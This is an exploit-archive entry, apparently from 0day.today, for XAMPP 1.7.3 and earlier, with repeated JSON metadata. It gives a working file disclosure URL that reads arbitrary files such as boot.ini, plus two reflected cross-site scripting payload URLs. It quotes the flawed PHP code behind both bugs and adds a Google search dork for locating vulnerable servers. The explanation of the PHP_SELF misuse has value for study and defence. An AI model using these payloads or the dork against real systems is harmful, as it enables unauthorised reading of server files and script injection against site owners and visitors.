ID 1337DAY-ID-14686 Type zdt Reporter TheLeader Modified 2010-11-02T00:00:00
Description
Exploit for php platform in category web applications
======================================
XAMPP <= 1.7.3 multiple vulnerabilites
======================================
# _ ____ __ __ ___
# (_)____ _ __/ __ \/ /_____ ____/ / _/_/ |
# / // __ \ | / / / / / //_/ _ \/ __ / / / / /
# / // / / / |/ / /_/ / ,< / __/ /_/ / / / / /
# /_//_/ /_/|___/\____/_/|_|\___/\__,_/ / /_/_/
# Live by the byte |_/_/
#
# Members:
#
# Pr0T3cT10n
# -=M.o.B.=-
# TheLeader
# Sro
# Debug
#
# Contact: [email protected]
#
# -----------------------------------
#
# Exploit Title: XAMPP <= 1.7.3 multiple vulnerabilites
# Date: 31/10/2010
# Author: TheLeader
# Software Link: http://www.apachefriends.org/en/xampp-windows.html
# Affected Version: 1.7.3 and prior
# Tested on Windows XP Hebrew, Service Pack 3
# ISRAEL, NULLBYTE.ORG.IL
#
# -----------------------------------
I. File disclosure
XAMPP is vulnerable to a remote file disclosure attack.
The vulnerability exists within the web application supplied with XAMPP.
http://[host]/xampp/showcode.php/c:boot.ini?showcode=1
showcode.php:
<?php
echo '<br><br>';
if ($_REQUEST['showcode'] != 1) {
echo '<a href="'.$_SERVER['PHP_SELF'].'?showcode=1">'.$TEXT['global-showcode'].'</a>';
} else {
$file = file_get_contents(basename($_SERVER['PHP_SELF']));
echo "<h2>".$TEXT['global-sourcecode']."</h2>";
echo "<textarea cols='100' rows='10'>";
echo htmlspecialchars($file);
echo "</textarea>";
}
?>
showcode.php relies on basename($_SERVER['PHP_SELF']) to retrieve the path.
What $_SERVER['PHP_SELF'] actually does is retrieve is the path of the requested file.
basename() parses the last element of that path using "/" as a delimiter.
Traveling through the directory tree, though, requires the "/" character that is used by basename() as a delimiter.
Therefor directory traveling it is not achieved but it is possible to view file contents from any drive, and the XAMPP htdocs directory.
II. Cross Site Scripting
http://[host]/xampp/phonebook.php/"><script>alert("XSS")</script>
http://[host]/xampp/biorhythm.php/"><script>alert("XSS")</script>
It is interesting to see the same programming error lead to another security vulnerability.
Some PHP scripts in the XAMPP dir rely on $_SERVER['PHP_SELF'] for retrieving the "action" tag for HTML forms.
This can be exploited to perform Cross Site Scripting attacks.
biorhythm.php (line 75):
<form method="post" action="<?php echo basename($_SERVER['PHP_SELF']); ?>">
dork: "inurl:xampp/biorhythm.php"
# 0day.today [2018-03-09] #
{"hash": "36eb4392082df056fbc9ce4757d982d54430b332365e51a67faa191d16b8626b", "id": "1337DAY-ID-14686", "lastseen": "2018-03-09T19:12:25", "viewCount": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "1095d736aa3352aae4f5a6ead0d444a5", "key": "href"}, {"hash": "a45c550a93cccf6da6778534855a3d3a", "key": "modified"}, {"hash": "a45c550a93cccf6da6778534855a3d3a", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "a562e93c77cd91d21b4bc6ad6d76fe06", "key": "reporter"}, {"hash": "62b738cdbda06bfa47d7f960fac1346e", "key": "sourceData"}, {"hash": "c9a5b86e05dde21994f9581929a2ed54", "key": "sourceHref"}, {"hash": "35d93ba1a450d183c88a0497f634b8a5", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2018-03-09T19:12:25"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:14686"]}], "modified": "2018-03-09T19:12:25"}, "vulnersScore": 0.1}, "type": "zdt", "sourceHref": "https://0day.today/exploit/14686", "description": "Exploit for php platform in category web applications", "title": "XAMPP <= 1.7.3 multiple vulnerabilites", "history": [{"bulletin": {"hash": "b238d4f212abcfb32e5bec42e8610e0e274daeab0c73b5d048c4fa1e279a2c2d", "id": "1337DAY-ID-14686", "lastseen": "2016-04-20T00:47:08", "enchantments": {"score": {"value": 3.6, "modified": "2016-04-20T00:47:08"}}, "hashmap": [{"hash": "4c0680f989b701a24ee326a75e3eef26", "key": "sourceHref"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "a45c550a93cccf6da6778534855a3d3a", "key": "published"}, {"hash": "a45c550a93cccf6da6778534855a3d3a", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "920914bde5ce62dd2e9dd04fef2c21ac", "key": "href"}, {"hash": "a562e93c77cd91d21b4bc6ad6d76fe06", "key": "reporter"}, {"hash": "35d93ba1a450d183c88a0497f634b8a5", "key": "title"}, {"hash": "c55d688c9d80660a908cbd771cb3b950", "key": "sourceData"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/14686", "description": "Exploit for php platform in category web applications", "viewCount": 0, "title": "XAMPP <= 1.7.3 multiple vulnerabilites", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "======================================\r\nXAMPP <= 1.7.3 multiple vulnerabilites\r\n======================================\r\n\r\n# _ ____ __ __ ___\r\n# (_)____ _ __/ __ \\/ /_____ ____/ / _/_/ |\r\n# / // __ \\ | / / / / / //_/ _ \\/ __ / / / / /\r\n# / // / / / |/ / /_/ / ,< / __/ /_/ / / / / /\r\n# /_//_/ /_/|___/\\____/_/|_|\\___/\\__,_/ / /_/_/ \r\n# Live by the byte |_/_/ \r\n#\r\n# Members:\r\n#\r\n# Pr0T3cT10n\r\n# -=M.o.B.=-\r\n# TheLeader\r\n# Sro\r\n# Debug\r\n#\r\n# Contact: inv0ked.israel@gmail.com\r\n#\r\n# -----------------------------------\r\n#\r\n# Exploit Title: XAMPP <= 1.7.3 multiple vulnerabilites\r\n# Date: 31/10/2010\r\n# Author: TheLeader\r\n# Software Link: http://www.apachefriends.org/en/xampp-windows.html\r\n# Affected Version: 1.7.3 and prior\r\n# Tested on Windows XP Hebrew, Service Pack 3\r\n# ISRAEL, NULLBYTE.ORG.IL\r\n#\r\n# -----------------------------------\r\n \r\nI. File disclosure\r\n \r\nXAMPP is vulnerable to a remote file disclosure attack.\r\nThe vulnerability exists within the web application supplied with XAMPP.\r\n \r\nhttp://[host]/xampp/showcode.php/c:boot.ini?showcode=1\r\n \r\nshowcode.php:\r\n<?php\r\n echo '<br><br>';\r\n if ($_REQUEST['showcode'] != 1) {\r\n echo '<a href=\"'.$_SERVER['PHP_SELF'].'?showcode=1\">'.$TEXT['global-showcode'].'</a>';\r\n } else {\r\n $file = file_get_contents(basename($_SERVER['PHP_SELF']));\r\n echo \"<h2>\".$TEXT['global-sourcecode'].\"</h2>\";\r\n echo \"<textarea cols='100' rows='10'>\";\r\n echo htmlspecialchars($file);\r\n echo \"</textarea>\";\r\n }\r\n?>\r\n \r\nshowcode.php relies on basename($_SERVER['PHP_SELF']) to retrieve the path.\r\nWhat $_SERVER['PHP_SELF'] actually does is retrieve is the path of the requested file.\r\nbasename() parses the last element of that path using \"/\" as a delimiter.\r\n \r\nTraveling through the directory tree, though, requires the \"/\" character that is used by basename() as a delimiter.\r\nTherefor directory traveling it is not achieved but it is possible to view file contents from any drive, and the XAMPP htdocs directory.\r\n \r\nII. Cross Site Scripting\r\n \r\nhttp://[host]/xampp/phonebook.php/\"><script>alert(\"XSS\")</script>\r\nhttp://[host]/xampp/biorhythm.php/\"><script>alert(\"XSS\")</script>\r\n \r\nIt is interesting to see the same programming error lead to another security vulnerability.\r\nSome PHP scripts in the XAMPP dir rely on $_SERVER['PHP_SELF'] for retrieving the \"action\" tag for HTML forms.\r\nThis can be exploited to perform Cross Site Scripting attacks.\r\n \r\nbiorhythm.php (line 75):\r\n<form method=\"post\" action=\"<?php echo basename($_SERVER['PHP_SELF']); ?>\">\r\n \r\ndork: \"inurl:xampp/biorhythm.php\"\r\n\r\n\n\n# 0day.today [2016-04-19] #", "published": "2010-11-02T00:00:00", "references": [], "reporter": "TheLeader", "modified": "2010-11-02T00:00:00", "href": "http://0day.today/exploit/description/14686"}, "lastseen": "2016-04-20T00:47:08", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "======================================\r\nXAMPP <= 1.7.3 multiple vulnerabilites\r\n======================================\r\n\r\n# _ ____ __ __ ___\r\n# (_)____ _ __/ __ \\/ /_____ ____/ / _/_/ |\r\n# / // __ \\ | / / / / / //_/ _ \\/ __ / / / / /\r\n# / // / / / |/ / /_/ / ,< / __/ /_/ / / / / /\r\n# /_//_/ /_/|___/\\____/_/|_|\\___/\\__,_/ / /_/_/ \r\n# Live by the byte |_/_/ \r\n#\r\n# Members:\r\n#\r\n# Pr0T3cT10n\r\n# -=M.o.B.=-\r\n# TheLeader\r\n# Sro\r\n# Debug\r\n#\r\n# Contact: [email\u00a0protected]\r\n#\r\n# -----------------------------------\r\n#\r\n# Exploit Title: XAMPP <= 1.7.3 multiple vulnerabilites\r\n# Date: 31/10/2010\r\n# Author: TheLeader\r\n# Software Link: http://www.apachefriends.org/en/xampp-windows.html\r\n# Affected Version: 1.7.3 and prior\r\n# Tested on Windows XP Hebrew, Service Pack 3\r\n# ISRAEL, NULLBYTE.ORG.IL\r\n#\r\n# -----------------------------------\r\n \r\nI. File disclosure\r\n \r\nXAMPP is vulnerable to a remote file disclosure attack.\r\nThe vulnerability exists within the web application supplied with XAMPP.\r\n \r\nhttp://[host]/xampp/showcode.php/c:boot.ini?showcode=1\r\n \r\nshowcode.php:\r\n<?php\r\n echo '<br><br>';\r\n if ($_REQUEST['showcode'] != 1) {\r\n echo '<a href=\"'.$_SERVER['PHP_SELF'].'?showcode=1\">'.$TEXT['global-showcode'].'</a>';\r\n } else {\r\n $file = file_get_contents(basename($_SERVER['PHP_SELF']));\r\n echo \"<h2>\".$TEXT['global-sourcecode'].\"</h2>\";\r\n echo \"<textarea cols='100' rows='10'>\";\r\n echo htmlspecialchars($file);\r\n echo \"</textarea>\";\r\n }\r\n?>\r\n \r\nshowcode.php relies on basename($_SERVER['PHP_SELF']) to retrieve the path.\r\nWhat $_SERVER['PHP_SELF'] actually does is retrieve is the path of the requested file.\r\nbasename() parses the last element of that path using \"/\" as a delimiter.\r\n \r\nTraveling through the directory tree, though, requires the \"/\" character that is used by basename() as a delimiter.\r\nTherefor directory traveling it is not achieved but it is possible to view file contents from any drive, and the XAMPP htdocs directory.\r\n \r\nII. Cross Site Scripting\r\n \r\nhttp://[host]/xampp/phonebook.php/\"><script>alert(\"XSS\")</script>\r\nhttp://[host]/xampp/biorhythm.php/\"><script>alert(\"XSS\")</script>\r\n \r\nIt is interesting to see the same programming error lead to another security vulnerability.\r\nSome PHP scripts in the XAMPP dir rely on $_SERVER['PHP_SELF'] for retrieving the \"action\" tag for HTML forms.\r\nThis can be exploited to perform Cross Site Scripting attacks.\r\n \r\nbiorhythm.php (line 75):\r\n<form method=\"post\" action=\"<?php echo basename($_SERVER['PHP_SELF']); ?>\">\r\n \r\ndork: \"inurl:xampp/biorhythm.php\"\r\n\r\n\n\n# 0day.today [2018-03-09] #", "published": "2010-11-02T00:00:00", "references": [], "reporter": "TheLeader", "modified": "2010-11-02T00:00:00", "href": "https://0day.today/exploit/description/14686"}
